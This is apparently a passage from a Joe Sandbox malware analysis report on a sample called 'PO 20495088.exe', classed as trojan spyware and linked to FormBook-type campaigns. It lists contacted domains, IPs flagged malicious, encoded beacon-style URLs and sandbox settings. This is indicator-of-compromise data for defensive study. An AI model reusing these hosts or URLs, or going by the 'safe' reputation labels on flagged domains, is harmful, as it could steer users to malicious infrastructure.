                                    		unknown
                                    http://www.newegg.club/z6yq/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.newegg.club/z6yq/?GLvL=i6ILStp&3Vh=IJnefPGbAG2krK+EKqL7a6PcsOn2aPK/WZ9HL1Dz7m/jpK3dV9N7lfXoIgTZBqqJT6Dwk+2xUIDeSWpocJA6c4hKTPFrc23hpH01F3StVZ8qYYY4ti7AYH4NQlXIhw0jjg==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tenmyk.shop/qpp1/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fedegaritech.online/sxrn/?3Vh=70g3synrMt+mv3bMA5M2pxuaxfXYXBcuz2rDMeB4YhlIhpmz1+c2ZYK3A+er04ehZbUUhJrT7mt7qDpgqvLlNMW5io5Y2wz+3pIWYjAXlaRVZqa6aRI+hdIryUt+yvXWOw==&GLvL=i6ILStptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.isirumah.info/guxl/?3Vh=VQ+MI0uxyUC67v7v1hceC1mX3dJlk0riHoAQ+3GvHNeFtXUu+z+ARRpD7cmGrTRyz64SdCAtvJHCLetkGUIMOH+WZ0Kd1BdS1tdCvwc6ShNqDahWH5yyFSR4U8rJOhuL/g==&GLvL=i6ILStptrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabsdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://dts.gnpge.comsKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://cdn.consentmanager.netsdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                http://www.fedegaritech.online/USC_University_Affiliated_Program.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.fedegaritech.online/Feeds.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaN5sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://i2.cdn-image.com/__media__/pics/28903/search.png)sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fedegaritech.online/Green_Foods_Benefits.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fedegaritech.online/__media__/design/underconstructionnotice.php?d=fedegaritech.onlinesdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.fedegaritech.online/__media__/js/trademark.php?d=fedegaritech.online&type=nssdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO 20495088.exe, 00000000.00000002.2338435823.0000000002F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://delivery.consentmanager.netsdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icosdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fedegaritech.online/Fodder.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaNsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.Fedegaritech.onlinesdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8sdiagnhost.exe, 00000009.00000002.3900182865.0000000005720000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000004010000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.ecosia.org/newtab/sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.fedegaritech.online/Cerebral_Palsy_Types.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ac.ecosia.org/autocomplete?q=sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://i2.cdn-image.com/__media__/pics/29590/bg1.png)sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.ssrnoremt-rise.sbssKyuoUfZdk.exe, 0000000A.00000002.3899309709.0000000001503000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://i2.cdn-image.com/__media__/js/min.js?v2.3sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		high

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      13.248.169.48
                                                                                                      		www.habitat.rentUnited States
                                                                                                      		16509AMAZON-02UStrue
                                                                                                      75.2.103.23
                                                                                                      		www.urssaf.proUnited States
                                                                                                      		16509AMAZON-02UStrue
                                                                                                      203.161.49.193
                                                                                                      		www.inspires.websiteMalaysia
                                                                                                      		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                      188.114.97.3
                                                                                                      		www.ssrnoremt-rise.sbsEuropean Union
                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                      208.91.197.27
                                                                                                      		www.fedegaritech.onlineVirgin Islands (BRITISH)
                                                                                                      		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                      3.33.130.190
                                                                                                      		livelovechat.liveUnited States
                                                                                                      		8987AMAZONEXPANSIONGBtrue
                                                                                                      149.115.238.44
                                                                                                      		www.newegg.clubUnited States
                                                                                                      		174COGENT-174UStrue
                                                                                                      104.21.74.79
                                                                                                      		www.tenmyk.shopUnited States
                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                      15.197.204.56
                                                                                                      		www.isirumah.infoUnited States
                                                                                                      		7430TANDEMUStrue

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1557623
                                                                                                      Start date and time:2024-11-18 13:51:56 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 9m 53s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Run name:Run with higher sleep bypass
                                                                                                      Number of analysed new started processes analysed:10
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:2
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:PO 20495088.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@10/7@9/9
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 75%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 93%
                                                                                                      • Number of executed functions: 113
                                                                                                      • Number of non-executed functions: 284
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: PO 20495088.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      No simulations

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      13.248.169.48Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.tals.xyz/010v/
                                                                                                      Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.wajf.net/dkz5/
                                                                                                      rG5EzfUhUp.exeGet hashmaliciousSakula RATBrowse
                                                                                                      • www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
                                                                                                      dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.extrem.tech/ikn1/
                                                                                                      Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.sonoscan.org/ew98/
                                                                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.hopeisa.live/v0jl/
                                                                                                      DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.layerzero.cfd/8f5m/
                                                                                                      rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.reviewpro.shop/aclh/
                                                                                                      FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.fitlook.shop/34uy/
                                                                                                      Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.dreampay.shop/a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM
                                                                                                      75.2.103.23ENQUIRY LED LIGHTS.pif.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.asklifeclarity.shop/b5w1/
                                                                                                      Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.heeraka.info/o7wc/
                                                                                                      rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.webeuz.buzz/pw0n/
                                                                                                      quote894590895pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.webeuz.buzz/pw0n/
                                                                                                      AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.heeraka.info/o7wc/
                                                                                                      PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.webeuz.buzz/okq4/
                                                                                                      203.161.49.193Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.futurevision.life/hxmz/
                                                                                                      PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.futurevision.life/hxmz/
                                                                                                      Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM
                                                                                                      Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • www.eco-tops.website/n54u/
                                                                                                      Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.futurevision.life/hxmz/
                                                                                                      DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.harmonid.life/aq3t/
                                                                                                      DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.harmonid.life/aq3t/
                                                                                                      Statement Cargomind 2024-09-12 (K07234).exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.fitlifa.xyz/6tsn/
                                                                                                      Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.simplek.top/ep69/
                                                                                                      Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.simplek.top/ep69/

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      www.tenmyk.shopAWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 104.21.74.79
                                                                                                      www.fedegaritech.onlineDHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 208.91.197.27
                                                                                                      Selected_Items.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • 208.91.197.27

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      CLOUDFLARENETUSickTGSF56D.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.9.44
                                                                                                      NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.16.123.96
                                                                                                      63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.16.123.96
                                                                                                      Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.69.226
                                                                                                      ickTGSF56D.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.69.226
                                                                                                      KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.69.226
                                                                                                      https://lnk.ie/7469O/e=Get hashmaliciousUnknownBrowse
                                                                                                      • 172.66.0.227
                                                                                                      Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 188.114.96.3
                                                                                                      NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.16.123.96
                                                                                                      AMAZON-02USfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      • 18.244.18.27
                                                                                                      Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 13.248.169.48
                                                                                                      https://discover.smartsheet.com/api/mailings/opened/PMRGSZBCHI2TAOBYGQ4DGMRMEJXXEZZCHIRDKM3GGYYWGZJTFU3DIZDEFU2DEMRUFU4DSNDGFVSTEYZQGYYWIMZSHA3DIIRMEJ3GK4TTNFXW4IR2EI2CELBCONUWOIR2EJ3DSV2VNA4U2V2WL5IGISJWGQZVK2ZTIFXXQ2KUGBUXSSJWPJSXA6DPN5TESQSXJFVESWJ5EJ6Q====.gifGet hashmaliciousUnknownBrowse
                                                                                                      • 44.230.175.247
                                                                                                      900092839283982.exeGet hashmaliciousDBatLoader, VIP KeyloggerBrowse
                                                                                                      • 52.216.214.9
                                                                                                      https://shorturl.at/cQweaGet hashmaliciousUnknownBrowse
                                                                                                      • 13.35.58.119
                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      • 3.170.115.43
                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                      • 18.141.10.107
                                                                                                      Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                      • 18.141.10.107
                                                                                                      harm5.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 54.171.230.55
                                                                                                      http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                      • 52.24.205.146
                                                                                                      AMAZON-02USfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      • 18.244.18.27
                                                                                                      Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 13.248.169.48
